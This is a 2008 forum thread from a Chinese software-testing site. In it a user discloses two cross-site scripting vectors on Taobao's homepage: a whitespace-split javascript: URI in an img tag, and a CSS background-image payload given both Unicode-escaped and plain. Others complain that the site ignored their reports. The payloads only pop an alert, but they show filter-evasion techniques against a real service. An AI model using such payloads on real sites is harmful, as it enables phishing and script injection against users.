51Testing软件测试论坛
标题:
淘宝首页XSS(新的2处)
[打印本页]
作者:
bzcyer
时间:
2008-10-21 13:38
标题:
淘宝首页XSS(新的2处)
写到自己博客上了:
http://www.bzcyer.com/view.asp?id=72
这里也贴一份,虽然没多少实际的用途,最多就做下钓鱼,
1、可以插入回车、包括段末结尾符和换行符的两种、即char(10)和char(13)、tab空格
<img src="jav as cript:al ert('test');">
2.转码
<DIV STYLE="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0061\006C\0065\0072\0074\0028\0027\0058\0053\0053\0027\0029\0029">
原始的代码是: <DIV STYLE="background-image:url(javascript:alert('XSS'))">
刚那没转码的:<DIV STYLE="background-image:url(javascript:alert('XSS'))">,试下一样出问题,看来这里转不转码都会出问题。
作者:
bzcyer
时间:
2008-10-21 13:40
在个人账户后台那,也有一些,taobao也没人处理,哎
现在是注册N多帐号,基本上测一次,报废1个帐号
作者:
bzcyer
时间:
2008-10-27 14:54
淘宝客服的回复,哎...
[attach]46387[/attach]
作者:
sihanjishu
时间:
2008-11-8 00:20
我在他们公司内网上也发过,可惜没有人理会。
还有很多。即使过滤过的一些漏洞,稍微变形一下,也可以测试出来。
无语了。
他们对xss不重视。
看来只有做出一个什么比较有危害的脚本,才可以“打动”他们。
不知道有没有注入漏洞。注入漏洞更危险。
作者:
bzcyer
时间:
2008-11-8 18:53
这个只是小问题,都没人处理,那我手上的一些严重的权限bug,都不能公布在网上,想告诉淘宝,得,也没人理。
那就继续放着好了。
作者:
F.Lampard
时间:
2008-12-23 16:01
淘宝照这样看来不安全哦
作者:
lvxdoo
时间:
2008-12-24 17:44
有机会一定加强学习
作者:
jessies
时间:
2009-4-30 11:21
一年前的帖子,淘宝应该现在重视了吧~~
作者:
moyiyun
时间:
2011-11-16 14:54
幸亏我们不是黑客
欢迎光临 51Testing软件测试论坛 (http://bbs.51testing.com/)
Powered by Discuz! X3.2
